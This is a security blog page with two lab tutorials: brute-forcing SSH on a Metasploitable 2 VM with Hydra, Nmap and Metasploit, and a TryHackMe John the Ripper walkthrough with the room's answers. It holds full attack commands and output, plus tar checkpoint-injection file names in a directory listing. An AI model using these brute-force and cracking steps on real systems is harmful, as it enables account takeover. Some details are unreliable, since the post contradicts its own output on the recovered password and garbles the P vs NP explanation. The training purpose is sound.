-->

ABOUT US

Our development agency is committed to providing you the best service.

OUR TEAM

The awesome people behind our brand ... and their life motto.

  • Kumar Atul Jaiswal

    Ethical Hacker

    Hacking is a Speed of Innovation And Technology with Romance.

  • Kumar Atul Jaiswal

    CEO Of Hacking Truth

    Loopholes are every major Security,Just need to Understand it well.

  • Kumar Atul Jaiswal

    Web Developer

    Techonology is the best way to Change Everything, like Mindset Goal.

OUR SKILLS

We pride ourselves with strong, flexible and top notch skills.

Marketing

Development 90%
Design 80%
Marketing 70%

Websites

Development 90%
Design 80%
Marketing 70%

PR

Development 90%
Design 80%
Marketing 70%

ACHIEVEMENTS

We help our clients integrate, analyze, and use their data to improve their business.

150

GREAT PROJECTS

300

HAPPY CLIENTS

650

COFFEES DRUNK

1568

FACEBOOK LIKES

STRATEGY & CREATIVITY

Phasellus iaculis dolor nec urna nullam. Vivamus mattis blandit porttitor nullam.

PORTFOLIO

We pride ourselves on bringing a fresh perspective and effective marketing to each project.

Showing posts with label cracking. Show all posts
Showing posts with label cracking. Show all posts
  • Brute Force and Password Cracking Live via three different tools

     

    Brute Force and Password Cracking Live via three different tools

     


    Representation


    You are a Penetration Tester hired by the company Hacking Truth to perform Password cracking/Brute Force tests on their internal Web Application and machines after knowing usernames and some kind of security test. You are asked to perform the penetration test on the client premises.



    Brute Force and Password Cracking Live on Metasploitable 2 via three different tools



    In this metasploitable2 environment, we get access to a Kali GUI instance. An SSH server can be accessed using the tools installed on Kali on virtual machine

    Objective: Perform the following activities:

    1. Find the password of user "msfadmin" using Hydra. Use password dictionary: //home/hackerboy/Desktop/Penetration-tester-jr/user.txt or rockyou.txt

    2. Find the password of user "msfadmin" use appropriate Nmap script. Use password dictionary list bydefault: /usr/share/nmap/nselib/data/passwords.lst and the user list is here /home/hackerboy/Desktop/Penetration-tester-jr/user1.txt

    3. Find the password of user "msfadmin" using the ssh_login Metasploit module. Use userpass dictionary: /home/hackerboy/Desktop/Penetration-tester-jr/userpass.txt

     

     

    Tools


    The best tools for this lab are:

    # Metasploit Framework
    # Hydra
    # Nmap

     

     


    Check the interfaces present on the Kali machine.

    Command - ifconfig

     

    Brute Force and Password Cracking Live via three different tools

     

     There are interface eth0 available and the ip is 192.168.6.45.




    Using Hydra


    Use Hydra to launch a dictionary attack on the SSH service for the "student" user.

    Hydra

    # Multi-threaded authentication brute force tool
    # Supports numerous protocols, including FTP, HTTP, IMAP, IRC, LDAP, SSH, VNC, etc.
    # Written in C


    Hydra help option

     


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ hydra -h                                                                                       
    Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
    
    Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [-m MODULE_OPT] [service://server[:PORT][/OPT]]
    
    Options:
      -R        restore a previous aborted/crashed session
      -I        ignore an existing restore file (don't wait 10 seconds)
      -S        perform an SSL connect
      -s PORT   if the service is on a different default port, define it here
      -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
      -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
      -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help
      -y        disable use of symbols in bruteforce, see above
      -r        use a non-random shuffling method for option -x
      -e nsr    try "n" null password, "s" login as pass and/or "r" reversed login
      -u        loop around users, not passwords (effective! implied with -x)
      -C FILE   colon separated "login:pass" format, instead of -L/-P options
      -M FILE   list of servers to attack, one entry per line, ':' to specify port
      -o FILE   write found login/password pairs to FILE instead of stdout
      -b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
      -f / -F   exit when a login/pass pair is found (-M: -f per host, -F global)
      -t TASKS  run TASKS number of connects in parallel per target (default: 16)
      -T TASKS  run TASKS connects in parallel overall (for -M, default: 64)
      -w / -W TIME  wait time for a response (32) / between connects per thread (0)
      -c TIME   wait time per login attempt over all threads (enforces -t 1)
      -4 / -6   use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
      -v / -V / -d  verbose mode / show login+pass for each attempt / debug mode 
      -O        use old SSL v2 and v3
      -K        do not redo failed attempts (good for -M mass scanning)
      -q        do not print messages about connection errors
      -U        service module usage details
      -m OPT    options specific for a module, see -U output for information
      -h        more command line options (COMPLETE HELP)
      server    the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
      service   the service to crack (see below for supported protocols)
      OPT       some service modules support additional input (-U for module help)
    
    Supported services: adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
    
    Hydra is a tool to guess/crack valid login/password pairs.
    Licensed under AGPL v3.0. The newest version is always available at;
    https://github.com/vanhauser-thc/thc-hydra
    Please don't use in military or secret service organizations, or for illegal
    purposes. (This is a wish and non-binding - most such people do not care about
    laws and ethics anyway - and tell themselves they are one of the good ones.)
    These services were not compiled in: afp ncp oracle sapr3 smb2.
    
    Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.
    E.g. % export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150 (or: socks4:// connect://)
         % export HYDRA_PROXY=connect_and_socks_proxylist.txt  (up to 64 entries)
         % export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080
         % export HYDRA_PROXY_HTTP=proxylist.txt  (up to 64 entries)
    
    Examples:
      hydra -l user -P passlist.txt ftp://192.168.0.1
      hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
      hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
      hydra -l admin -p password ftp://[192.168.0.0/24]/
      hydra -L logins.txt -P pws.txt -M targets.txt ssh
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$                   
    



    We are going to use wordlist /home/hackerboy/Desktop/Penetration-tester-jr/user.txt or rockyou.txt


    Now, use the Hydra tool to launch the attack.



    Command

    hydra -l msfadmin -P /home/hackerboy/Desktop/Penetration-tester-jr/user.txt ssh://192.168.6.45

    -l
    Login with a single username

    -P
    Load several passwords from the list


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ hydra -l msfadmin -P /home/hackerboy/Desktop/Penetration-tester-jr/user.txt ssh://192.168.6.45 
    Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
    
    Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-24 20:33:02
    [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
    [DATA] max 13 tasks per 1 server, overall 13 tasks, 13 login tries (l:1/p:13), ~1 try per task
    [DATA] attacking ssh://192.168.6.45:22/
    [22][ssh] host: 192.168.6.45   login: msfadmin   password: msfadmin
    1 of 1 target successfully completed, 1 valid password found
    [WARNING] Writing restore file because 1 final worker threads did not complete until end.
    [ERROR] 1 target did not resolve or could not be connected
    [ERROR] 0 target did not complete
    Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-24 20:33:05
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$                                                                                                                            
    
    
    


    Brute Force and Password Cracking Live via three different tools



    The password for the msfadmin user is msfadmin.




    Using Nmap Script


    We will run ssh-brute Nmap script to find the password of the "administrator" user.

    Password List to be used bydefault via nmap

    /usr/share/john/password.lst


    /home/hackerboy/Desktop/Penetration-tester-jr/user1.txt




    ssh-brute script


    ssh-brute.nse is a Nmap script used to launch dictionary attacks on the SSH service.

    This script takes a username and password list files. This is useful when the target username is not known to the attacker. However, in this case, we are already aware of the username i.e. "administrator". So, we will create a new file containing only this username.


    Command


    echo "msfadmin" > users1.txt

    NOTE- msfadmin is our username



    The password list is "/usr/share/nmap/nselib/data/passwords.lst".

    We can now run the script,


    Command

    nmap -p 22 --script ssh-brute --script-args userdb=/home/hackerboy/Desktop/Penetration-tester-jr/user1.txt 192.168.6.45


     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ sudo nmap -p 22 --script ssh-brute --script-args userdb=/home/hackerboy/Desktop/Penetration-tester-jr/user1.txt 192.168.6.45 
    [sudo] password for hackerboy: 
    Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-24 20:35 IST
    NSE: [ssh-brute] Trying username/password pair: msfadmin:msfadmin
    NSE: [ssh-brute] Trying username/password pair: msfadmin:
    NSE: [ssh-brute] Trying username/password pair: msfadmin:123456
    NSE: [ssh-brute] Trying username/password pair: msfadmin:12345
    NSE: [ssh-brute] Trying username/password pair: msfadmin:123456789
    Nmap scan report for 192.168.6.45
    Host is up (0.00036s latency).
    
    PORT   STATE SERVICE
    22/tcp open  ssh
    | ssh-brute: 
    |   Accounts: 
    |     msfadmin:msfadmin - Valid credentials
    |_  Statistics: Performed 5 guesses in 13 seconds, average tps: 0.4
    MAC Address: 08:00:27:67:67:30 (Oracle VirtualBox virtual NIC)
    
    Nmap done: 1 IP address (1 host up) scanned in 23.21 seconds
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ 
    
    
    
    

     

    Brute Force and Password Cracking Live via three different tools

     


    The password of the "msfadmin" user is msfadmin






    Using Metasploit


    We can use

    auxiliary/scanner/ssh/ssh_login

    auxiliary module of the Metasploit framework to find the valid password for the "msfadmin" user.

    ssh_login module

    It is an auxiliary scanner module for ssh service in Metasploit. It also pops up an SSH shell on success.


    Start msfconsole in quite mode using
    -q
    option



    Command

    msfconsole -q

     



    Use the auxiliary/scanner/ssh/ssh_login module and set all required target details i.e RHOSTS, USERPASS_FILE, STOP_ON_SUCCESS, verbose etc.



    Password List

    /usr/share/wordlists/metasploit/root_userpass.txt or /home/hackerboy/Desktop/Penetration-tester-jr/userpass.txt

     

    Command

    use auxiliary/scanner/ssh/ssh_login
    set RHOSTS demo.ine.local
    set USERPASS_FILE /home/hackerboy/Desktop/Penetration-tester-jr/userpass.txt
    set STOP_ON_SUCCESS true
    set verbose true
    exploit




    RHOSTS
    : Target IP address

    USERPASS_FILE
    : Custom Username and Password file i.e user:pass


    STOP_ON_SUCCESS
    : If set to
    true

    -the operation stops after finding the working credentials


    verbose
    : If set to
    true

    -operation logs will be shown on console 

     

     

    hackingtruth.in
    userpass.txt

     

     

     



     

    msf6 >
    msf6 > search ssh_login
    
    Matching Modules
    ================
    
       #  Name                                    Disclosure Date  Rank    Check  Description
       -  ----                                    ---------------  ----    -----  -----------
       0  auxiliary/scanner/ssh/ssh_login                          normal  No     SSH Login Check Scanner
       1  auxiliary/scanner/ssh/ssh_login_pubkey                   normal  No     SSH Public Key Login Scanner
    
    
    Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/ssh/ssh_login_pubkey
    
    msf6 > use 0
    msf6 auxiliary(scanner/ssh/ssh_login) > 
    
    
    msf6 auxiliary(scanner/ssh/ssh_login) > 
    msf6 auxiliary(scanner/ssh/ssh_login) > 
    msf6 auxiliary(scanner/ssh/ssh_login) > 
    msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.6.45
    RHOSTS => 192.168.6.45
    msf6 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /home/hackerboy/Desktop/Penetration-tester-jr/userpass.txt
    USERPASS_FILE => /home/hackerboy/Desktop/Penetration-tester-jr/userpass.txt
    msf6 auxiliary(scanner/ssh/ssh_login) > set STOP_ON_SUCCESS true
    STOP_ON_SUCCESS => true
    msf6 auxiliary(scanner/ssh/ssh_login) > set verbose true
    verbose => true
    msf6 auxiliary(scanner/ssh/ssh_login) > exploit
    
    [*] 192.168.6.45:22 - Starting bruteforce
    [-] 192.168.6.45:22 - Failed: 'hackerboy:hackerbo'
    [-] 192.168.6.45:22 - Failed: 'hackerboy:hacker'
    [-] 192.168.6.45:22 - Failed: 'hackerboy:atul'
    [-] 192.168.6.45:22 - Failed: 'hackerboy:atulthehackerboy'
    [-] 192.168.6.45:22 - Failed: 'hackerboy:fadsg'
    [-] 192.168.6.45:22 - Failed: 'hackerboy:fdasg'
    [+] 192.168.6.45:22 - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
    [*] Command shell session 2 opened (192.168.6.25:42191 -> 192.168.6.45:22 ) at 2021-12-24 20:00:21 +0530
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf6 auxiliary(scanner/ssh/ssh_login) > 
    
    

     

     

    Brute Force and Password Cracking Live via three different tools



    The password for the "msfadmin" user is attack. The tools have also provided an SSH shell.

    Command

    sessions

     

     

    msf6 auxiliary(scanner/ssh/ssh_login) > 
    msf6 auxiliary(scanner/ssh/ssh_login) > 
    msf6 auxiliary(scanner/ssh/ssh_login) > sessions
    
    Active sessions
    ===============
    
      Id  Name  Type         Information                                Connection
      --  ----  ----         -----------                                ----------
      1         shell linux  SSH hackerboy:hackerboy (192.168.6.25:22)  192.168.6.25:41331 -> 192.168.6.25:22  (192.168.6.25)
      2         shell linux  SSH msfadmin:msfadmin (192.168.6.45:22)    192.168.6.25:42191 -> 192.168.6.45:22  (192.168.6.45)
    
    msf6 auxiliary(scanner/ssh/ssh_login) > 
    
    

     

     



    Metasploit framework takes more time for dictionary attacks in comparison to Hydra and Nmap.

    We can use the credentials to access the target machine using the SSH command.



    SSH to the target machine using the credentials of user "root".


    Command

    ssh msfadmin@192.168.6.45
    <yes>
    <attack>
    id
    whoami
    ls -la


     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$                                                                                                                             130 ⨯
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ ssh msfadmin@192.168.6.45                                                                                                   130 ⨯
    The authenticity of host '192.168.6.45 (192.168.6.45)' can't be established.
    RSA key fingerprint is SHA256:BQHm5EoHX9GCiOLuVscegPXLQOsuPs+E9d/rrJB84rk.
    This host key is known by the following other names/addresses:
        ~/.ssh/known_hosts:2: [hashed name]
        ~/.ssh/known_hosts:6: [hashed name]
        ~/.ssh/known_hosts:80: [hashed name]
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '192.168.6.45' (RSA) to the list of known hosts.
    msfadmin@192.168.6.45's password: 
    Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
    
    The programs included with the Ubuntu system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.
    
    Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
    applicable law.
    
    To access official Ubuntu documentation, please visit:
    http://help.ubuntu.com/
    No mail.
    Last login: Fri Dec 24 09:17:35 2021
    msfadmin@metasploitable:~$ id
    uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
    msfadmin@metasploitable:~$       
    msfadmin@metasploitable:~$ whoami
    msfadmin
    msfadmin@metasploitable:~$ 
    msfadmin@metasploitable:~$ ls -la
    total 68
    drwxr-xr-x 7 msfadmin msfadmin 4096 2021-07-09 16:15 .
    drwxrwxrwx 7 root     root     4096 2021-06-02 05:32 ..
    lrwxrwxrwx 1 root     root        9 2012-05-14 00:26 .bash_history -> /dev/null
    -rw-r--r-- 1 msfadmin msfadmin    1 2021-06-02 06:04 --checkpoint=1
    -rw-r--r-- 1 msfadmin msfadmin    1 2021-06-02 06:03 --checkpoint-action=exec=sh test.sh
    -rw-r--r-- 1 msfadmin msfadmin    0 2020-12-05 10:37 data.txt
    drwxr-xr-x 4 msfadmin msfadmin 4096 2010-04-17 14:11 .distcc
    drwx------ 2 msfadmin msfadmin 4096 2021-07-13 06:25 .gconf
    drwx------ 2 msfadmin msfadmin 4096 2021-07-13 06:25 .gconfd
    -rw-r--r-- 1 msfadmin msfadmin  891 2021-04-25 08:20 index.html
    -rw-r--r-- 1 msfadmin msfadmin  891 2021-04-25 08:20 index.html.1
    -rw-r--r-- 1 msfadmin msfadmin   14 2021-04-25 08:22 index.html.2
    -rw------- 1 root     root     4174 2012-05-14 02:01 .mysql_history
    -rw-r--r-- 1 msfadmin msfadmin  586 2010-03-16 19:12 .profile
    -rwx------ 1 msfadmin msfadmin    4 2012-05-20 14:22 .rhosts
    drwx------ 2 msfadmin msfadmin 4096 2020-12-05 10:18 .ssh
    -rw-r--r-- 1 msfadmin msfadmin    0 2010-05-07 14:38 .sudo_as_admin_successful
    -rw-r--r-- 1 msfadmin msfadmin   56 2021-06-02 06:03 test.sh
    drwxr-xr-x 6 msfadmin msfadmin 4096 2010-04-27 23:44 vulnerable
    msfadmin@metasploitable:~$ 
    
    
    

     


    This is how we can launch dictionary attacks on services using Hydra, Nmap, and Metasploit.



    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.

     

     

  • All About Hashing Cracking Tool John The Ripper

    All About Hashing Cracking Tool John The Ripper


     

    John The Ripper



    Learn how to use John the Ripper - An extremely powerful and adaptable hash cracking tool All About Hashing Cracking Tool John The Ripper


    Task 1 John who?


    Welcome

    John the Ripper is one of the most well known, well-loved and versatile hash cracking tools out there. It combines a fast cracking speed, with an extraordinary range of compatible hash types. This room will assume no previous knowledge, so we must first cover some basic terms and concepts before we move into practical hash cracking.


    What are Hashes?


    A hash is a way of taking a piece of data of any length and  representing it in another form that is a fixed length. This masks the original value of the data. This is done by running the original data through a hashing algorithm. There are many popular hashing algorithms, such as MD4,MD5, SHA1 and NTLM. Lets try and show this with an example:

    If we take "polo", a string of 4 characters- and run it through an MD5 hashing algorithm, we end up with an output of: b53759f3ce692de7aff1b5779d3964da a standard 32 character MD5 hash.



    Likewise, if we take "polomints", a string of 9 characters- and run it through the same MD5 hashing algorithm, we end up with an output of:   

    584b6e4f4586e136bc280f27f9c64f3b  another standard 32 character MD5 hash.


     

    What makes Hashes secure?


    Hashing algorithms are designed so that they only operate one way. This means that a calculated hash cannot be reversed using just the output given. This ties back to a fundamental mathematical problem known as the P vs NP relationship .

    While this is an extremely interesting mathematical concept that proves fundamental to computing and cryptography I am in no way qualified to try and explain it in detail here; but abstractly it means that the algorithm to hash the value will be "NP" and can therefore be calculated reasonably. However an un-hashing algorithm would be "P" and intractable to solve- meaning that it cannot be computed in a reasonable time using standard computers.


     

    Where John Comes in...

    Even though the algorithm itself is not feasibly reversible. That doesn't mean that cracking the hashes is impossible. If you have the hashed version of a password, for example- and you know the hashing algorithm- you can use that hashing algorithm to hash a large number of words, called a dictionary. You can then compare these hashes to the one you're trying to crack, to see if any of them match. If they do, you now know what word corresponds to that hash- you've cracked it!

    This process is called a dictionary attack and John the Ripper, or John as it's commonly shortened to, is a tool to allow you to conduct fast brute force attacks on a large array of different hash types.






    Task 2 Setting up John the Ripper




    Setting Up John The Ripper

    John the Ripper is supported on many different Operating Systems, not just Linux Distributions. As a note before we go through this, there are multiple versions of John, the standard "core" distribution, as well as multiple community editions- which extend the feature set of the original John distribution. The most popular of these distributions is the "Jumbo John"- which we will be using specific features of later.



    Parrot, Kali and AttackBox


    If you're using Parrot OS, Kali Linux or TryHackMe's own AttackBox- you should already have Jumbo John installed. You can double check this by typing john into the terminal. You should be met with a usage guide for john, with the first line reading: "John the Ripper 1.9.0-jumbo-1" or similar with a different version number. If not, you can use sudo apt install john to install it.




    Blackarch


    If you're using Blackarch, or the Blackarch repositories you may or may not have Jumbo John installed, to check if you do, use the command pacman -Qe | grep "john"  Post settings Labels TryHackMe, john the ripper, hashing, cracking Published on 23/01/2021 23:39 Permalink Location Search description Options Custom robot tags Edit image Size Small Medium Large X-large Original size Maximum of 150 characters entered You should be met with an output similar to "john 1.9.0.jumbo1-5" or similar with a different version number. If you do not have it installed, you can simply use pacman -S john to install it.




    Building from Source for Linux


    If you wish to build the package from source to meet your system requirements, you can do this in five fairly straightforward steps. Further advice on the installation process and how to configure your build from source can be found here.


    Use git clone https://github.com/openwall/john -b bleeding-jumbo john to clone the jumbo john repository to your current working

    Then cd john/src/ to change your current directory to where the source code is.

    Once you're in this directory, use ./configure to check the required dependencies and options that have been configured.

    If you're happy with this output, and have installed any required dependencies that are needed, use make -s clean && make -sj4 to build a binary of john. This binary will be in the above run directory, which you can change to with cd ../run

    You can test this binary using ./john --test



    Installing on Windows


    To install Jumbo John the Ripper on Windows, you just need to download and install the zipped binary for either 64 bit systems here or for 32 bit systems here.
     

    1) What is the most popular extended version of John the Ripper?

    Ans :- Jumbo John




    Task 3 Wordlists

    Wordlists


    As we explained in the first task, in order to in order to dictionary attack hashes, you need a list of words that you can hash and compare, unsurprisingly this is called a wordlist. There are many different wordlists out there, a good collection to use can be found in the SecLists repository. There are a few places you can look for wordlists on your attacking system of choice, we will quickly run through where you can find them.



    Parrot, Kali and AttackBox



    On Parrot, Kali and TryHackMe's AttackBox- you can find a series of amazing wordlists in the /usr/share/wordlists directory.




    RockYou


    For all of the tasks in this room, we will be using the infamous rockyou.txt wordlist- which is a very large common password wordlist, obtained from a data breach on a website called rockyou.com in 2009. If you are not using any of the above distributions, you can get the rockyou.txt wordlist from the SecLists repository under the /Passwords/Leaked-Databases subsection. You may need to extract it from .tar.gz format, using tar xvzf rockyou.txt.tar.gz.



    Now that we have our hash cracker and wordlists all set up, lets move onto some hash cracking!
     

     

    1) What website was the rockyou.txt wordlist created from a breach on?

    Ans :- rockyou.com




    Hashes File Download Here :-







    Task 4 Cracking Basic Hashes



    Cracking Basic Hashes


    There are multiple ways to use John the Ripper to crack simple hashes, we're going to walk through a few, before moving on to cracking some ourselves.




    John Basic Syntax


    The basic syntax of John the Ripper commands is as follows. We will cover the specific options and modifiers used as we use them.

    john [options] [path to file]


    john - Invokes the John the Ripper program

    [path to file] - The file containing the hash you're trying to crack, if it's in the same directory you won't need to name a path, just the file.




    Automatic Cracking


    John has built-in features to detect what type of hash it's being given, and to select appropriate rules and formats to crack it for you, this isn't always the best idea as it can be unreliable- but if you can't identify what hash type you're working with and just want to try cracking it, it can be a good option! To do this we use the following syntax:



    john --wordlist=[path to wordlist] [path to file]



    --wordlist= - Specifies using wordlist mode, reading from the file that you supply in the following path...


    [path to wordlist] - The path to the wordlist you're using, as described in the previous task.




    Example Usage:

    john --wordlist=/usr/share/wordlists/rockyou.txt hash_to_crack.txt




    Identifying Hashes


    Sometimes John won't play nicely with automatically recognising and loading hashes, that's okay! We're able to use other tools to identify the hash, and then set john to use a specific format. There are multiple ways to do this, such as using an online hash identifier like this one. I like to use a tool called hash-identifier, a Python tool that is super easy to use and will tell you what different types of hashes the one you enter is likely to be, giving you more options if the first one fails.


    To use hash-identifier, you can just pull the python file from gitlab using: wget https://gitlab.com/kalilinux/packages/hash-identifier/-/raw/kali/master/hash-id.py.


    Then simply launch it with python3 hash-identifier.py and then enter the hash you're trying to identify- and it will give you possible formats!


     

     


     

     

    Format-Specific Cracking

    Once you have identified the hash that you're dealing with, you can tell john to use it while cracking the provided hash using the following syntax:


    john --format=[format] --wordlist=[path to wordlist] [path to file]



    --format= - This is the flag to tell John that you're giving it a hash of a specific format, and to use the following format to crack it

    [format] - The format that the hash is in



    Example Usage:

    john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash_to_crack.txt



    A Note on Formats:


    When you are telling john to use formats, if you're dealing with a standard hash type, e.g. md5 as in the example above, you have to prefix it with raw- to tell john you're just dealing with a standard hash type, though this doesn't always apply. To check if you need to add the prefix or not, you can list all of John's formats using john --list=formats and either check manually, or grep for your hash type using something like john --list=formats | grep -iF "md5".



    Practical

    Now you know the syntax, modifiers and methods to crack basic hashes, try it yourself! Download the attached .txt files that


    1) What type of hash is hash1.txt?

    Ans :- md5



    2) What is the cracked value of hash1.txt?

    Ans :- biscuit




     

     

    3) What type of hash is hash2.txt?

    Ans :- sha1



    4) What is the cracked value of hash2.txt

    Ans :- kangeroo




     

     

     

    5) What type of hash is hash3.txt?

    Ans :- sha256



    6) What is the cracked value of hash3.txt

    Ans :- microphone





     

    7) What type of hash is hash4.txt?

    Ans :- whirlpool



    8) What is the cracked value of hash4.txt

    HINT :- As the hint say you don’t need to put raw after — format-


    Ans :- colossal








    Task 5 Cracking Windows Authentication Hashes


    Cracking Windows Hashes


    Now that we understand the basic syntax and usage of John the Ripper- lets move on to cracking something a little bit more difficult, something that you may even want to attempt if you're on a real Penetration Test or Red Team engagement. Authentication hashes are the hashed versions of passwords that are stored by operating systems, it is sometimes possible to crack them using the brute-force methods that we're using. To get your hands on these hashes, you must often already be a privileged user- so we will explain some of the hashes that we plan on cracking as we attempt them.




    NTHash / NTLM

    NThash is the hash format that modern Windows Operating System machines will store user and service passwords in. It's also commonly referred to as "NTLM" which references the previous version of Windows format for hashing passwords known as "LM", thus "NT/LM".


    A little bit of history, the NT designation for Windows products originally meant "New Technology", and was used- starting with Windows NT, to denote products that were not built up from the MS-DOS Operating System. Eventually, the "NT" line became the standard Operating System type to be released by Microsoft and the name was dropped, but it still lives on in the names of some Microsoft technologies.


    You can acquire NTHash/NTLM hashes by dumping the SAM database on a Windows machine, by using a tool like Mimikatz or from the Active Directory database: NTDS.dit. You may not have to crack the hash to continue privilege escalation- as you can often conduct a "pass the hash" attack instead, but sometimes hash cracking is a viable option if there is a weak password policy.




    Practical

    Now that you know the theory behind it, see if you can use the techniques we practiced in the last task, and the knowledge of what type of hash this is to crack the ntlm.txt file!



    1) What do we need to set the "format" flag to, in order to crack this?


    Ans :- NT



    2) What is the cracked value of this password?

    Ans :- mushroom





     


    Task 6 Cracking /etc/shadow Hashes


    Cracking Hashes from /etc/shadow


    The /etc/shadow file is the file on Linux machines where password hashes are stored. It also stores other information, such as the date of last password change and password expiration information. It contains one entry per line for each user or user account of the system. This file is usually only accessible by the root user- so in order to get your hands on the hashes you must have sufficient privileges, but if you do- there is a change that you will be able to crack some of the hashes.




    Unshadowing


    John can be very particular about the formats it needs data in to be able to work with it, for this reason- in order to crack /etc/shadow passwords, you must combine it with the /etc/passwd file in order for John to understand the data it's being given. To do this, we use a tool built into the John suite of tools called unshadow. The basic syntax of unshadow is as follows:



    unshadow [path to passwd] [path to shadow]


    unshadow - Invokes the unshadow tool


    [path to passwd] - The file that contains the copy of the /etc/passwd file you've taken from the target machine


    [path to shadow] - The file that contains the copy of the /etc/shadow file you've taken from the target machine




    Example Usage:


    unshadow local_passwd local_shadow > unshadowed.txt




    Note on the files


    When using unshadow, you can either use the entire /etc/passwd and /etc/shadow file- if you have them available, or you can use the relevant line from each, for example:


    FILE 1 - local_passwd


    Contains the /etc/passwd line for the root user:


    root:x:0:0::/root:/bin/bash




    FILE 2 - local_shadow


    Contains the /etc/shadow line for the root user:


    root:$6$2nwjN454g.dv4HN/$m9Z/r2xVfweYVkrr.v5Ft8Ws3/YYksfNwq96UL1FX0OJjY1L6l.DS3KEVsZ9rOVLB/ldTeEL/OIhJZ4GMFMGA0:18576::::::




    Cracking

    We're then able to feed the output from unshadow, in our example use case called "unshadowed.txt" directly into John. We should not need to specify a mode here as we have made the input specifically for John, however in some cases you will need to specify the format as we have done previously using: --format=sha512crypt


    john --wordlist=/usr/share/wordlists/rockyou.txt --format=sha512crypt unshadowed.txt




    Practical



    Now, see if you can follow the process to crack the password hash of the root user that is provided in the "etc_hashes.txt" file. Good luck!


    1) What is the root password?

    Ans :- 1234







     

    Task 7 Single Crack Mode



    Single Crack Mode



    So far we've been using John's wordlist mode to deal with brute forcing simple., and not so simple hashes. But John also has another mode, called Single Crack mode. In this mode, John uses only the information provided in the username, to try and work out possible passwords heuristically, by slightly changing the letters and numbers contained within the username.



    Word Mangling



    The best way to show what Single Crack mode is,  and what word mangling is, is to actually go through an example:

    If we take the username: Markus




    Some possible passwords could be:


    •     Markus1, Markus2, Markus3 (etc.)
    •     MArkus, MARkus, MARKus (etc.) 
    •     Markus!, Markus$, Markus* (etc.) 



    This technique is called word mangling. John is building it's own dictionary based on the information that it has been fed and uses a set of rules called "mangling rules" which define how it can mutate the word it started with to generate a wordlist based off of relevant factors for the target you're trying to crack. This is exploiting how poor passwords can be based off of information about the username, or the service they're logging into.




    GECOS



